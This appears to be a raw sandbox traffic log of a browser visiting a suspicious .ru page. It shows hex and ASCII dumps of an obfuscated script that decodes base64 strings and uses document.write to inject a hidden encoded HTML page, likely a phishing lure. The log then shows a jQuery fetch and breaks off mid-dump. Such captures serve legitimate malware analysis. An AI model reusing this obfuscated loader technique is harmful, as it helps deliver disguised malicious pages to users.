2025-03-25 01:09:26 UTC	675	OUT	GET /vHFigT/ HTTP/1.1 Host: uz5k.vsmaemhjvk.ru Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 01:09:27 UTC	1204	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 01:09:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5XmY6XzEXZjyS9thQikEzeGJyNgJmo9glaeyIYskBxZYen6OI7l%2BnsEa8Gr%2F%2FA5CtNq7MfMQf2YCf7RVSIdMUtlSgmwqJBXeiHOlSa2FqOYOMyvDto3RK1ZBgPE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} server-timing: cfL4;desc="?proto=TCP&rtt=294&min_rtt=278&rtt_var=88&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1573&delivery_rate=13390728&cwnd=252&unsent_bytes=0&cid=d4b8986be850dd93&ts=216&x=0" Set-Cookie: XSRF-TOKEN=eyJpdiI6IlNHUVNQQjhHbXZubUdBZEI1U2g4SkE9PSIsInZhbHVlIjoiem4vT0xJRnFlcVd3UXJTM24yYlJvTUN4c0lxT0FXLzI4WTk1RVVzYVdPOG8zMUNieGJKYXBGZE1aRDZzd0VWcUlKSzlBdzUrbXFXbjNTaVlmTEFkY1NneTF5SWlib3UvK2NQbVdCSlhvUFlrcWViemJKZkhNL0xVTE9VQkF5OUwiLCJtYWMiOiIzMWMwMzE3N2Y0ZjcwNTg5N2JlYzM0MjgyOTk1OWVkMzNmYzljYmRlNDJlNDhlOWE2N2U1ZGUxODFiNzI3YTgzIiwidGFnIjoiIn0%3D; expires=Tue, 25-Mar-2025 03:09:27 GMT; Max-Age=7200; path=/; secure; samesite=none
2025-03-25 01:09:27 UTC	764	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 67 79 56 45 4e 53 52 56 5a 52 55 6b 67 72 4e 55 78 5a 65 6b 45 76 53 57 64 57 63 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 6a 5a 5a 63 44 56 74 61 33 6c 52 63 30 64 77 64 54 6c 77 57 6d 56 36 57 58 63 34 54 6e 4e 35 52 47 55 32 52 6b 67 33 62 58 4e 72 53 30 46 4a 53 30 70 51 55 6c 5a 61 56 55 31 6f 56 32 56 6e 57 45 31 31 57 55 56 70 4b 30 5a 79 61 45 38 79 4c 33 67 35 57 58 64 6c 5a 46 41 32 4d 44 68 6e 63 47 31 70 53 6b 49 33 52 6d 5a 61 57 47 56 52 52 30 52 45 53 45 34 30 4e 56 6b 31 54 47 5a 53 57 46 6b 77 56 56 70 4f 59 31 6c 44 4d 58 45 79 55 30 78 50 62 44 64 75 56 6b 6c 43 4f 55 5a 44 63 47 73 32 61 55 4e 53 64 47 51 Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlgyVENSRVZRUkgrNUxZekEvSWdWc1E9PSIsInZhbHVlIjoiUjZZcDVta3lRc0dwdTlwWmV6WXc4TnN5RGU2Rkg3bXNrS0FJS0pQUlZaVU1oV2VnWE11WUVpK0ZyaE8yL3g5WXdlZFA2MDhncG1pSkI3RmZaWGVRR0RESE40NVk1TGZSWFkwVVpOY1lDMXEyU0xPbDduVklCOUZDcGs2aUNSdGQ
2025-03-25 01:09:27 UTC	242	IN	Data Raw: 65 63 0d 0a 3c 73 63 72 69 70 74 3e 0a 52 7a 46 74 46 68 42 4c 63 65 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 31 57 6a 56 72 4c 6e 5a 7a 62 57 46 6c 62 57 68 71 64 6d 73 75 63 6e 55 76 64 6b 68 47 61 57 64 55 4c 77 3d 3d 22 29 3b 0a 54 4f 63 45 4e 53 4b 62 42 57 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 62 53 46 4b 49 53 75 67 46 63 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 52 7a 46 74 46 68 42 4c 63 65 20 3d 3d 20 54 4f 63 45 4e 53 4b 62 42 57 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 62 53 46 4b 49 53 75 67 46 63 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 0d 0a Data Ascii: ec<script>RzFtFhBLce = atob("aHR0cHM6Ly91WjVrLnZzbWFlbWhqdmsucnUvdkhGaWdULw==");TOcENSKbBW = atob("bm9tYXRjaA==");bSFKISugFc = atob("d3JpdGU=");if(RzFtFhBLce == TOcENSKbBW){document[bSFKISugFc](decodeURIComponent(escape(atob('PCFET0N
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f 64 47 31 73 50 67 6f 38 61 47 56 68 5a 44 34 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 68 30 64 48 41 74 5a 58 46 31 61 58 59 39 49 6c 67 74 56 55 45 74 51 32 39 74 63 47 46 30 61 57 4a 73 5a 53 49 67 59 32 39 75 64 47 56 75 64 44 30 69 53 55 55 39 52 57 52 6e 5a 53 78 6a 61 48 4a 76 62 57 55 39 4d 53 49 2b 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 75 59 57 31 6c 50 53 4a 79 62 32 4a 76 64 48 4d 69 49 47 4e 76 62 6e 52 6c 62 6e 51 39 49 6d 35 76 61 57 35 6b 5a 58 67 73 49 47 35 76 5a 6d 39 73 62 47 39 33 49 6a 34 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b Data Ascii: 7ffaUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1k
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f Data Ascii: ++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++o
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f Data Ascii: +oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpOOFpO++oO++oO++oOOFpOOFpOOFpOOFpOOFpO
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b Data Ascii: oO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oO++oOOFpO++oO++oOOFpO++oOOFpO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO+
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 Data Ascii: O++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oOOFpOOFpOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOF
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f Data Ascii: ++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++o
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f Data Ascii: +oO++oO++oOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO
2025-03-25 01:09:27 UTC	1369	IN	Data Raw: 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b Data Ascii: oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	151.101.194.137	443	1596	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 01:09:28 UTC	665	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://uz5k.vsmaemhjvk.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 01:09:28 UTC	565	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Tue, 25 Mar 2025 01:09:28 GMT Via: 1.1 varnish Age: 1533951 X-Served-By: cache-lga21933-LGA X-Cache: HIT X-Cache-Hits: 1370 X-Timer: S1742864969.685365,VS0,VE0 Vary: Accept-Encoding
2025-03-25 01:09:28 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-25 01:09:28 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-25 01:09:28 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-25 01:09:28 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-25 01:09:28 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 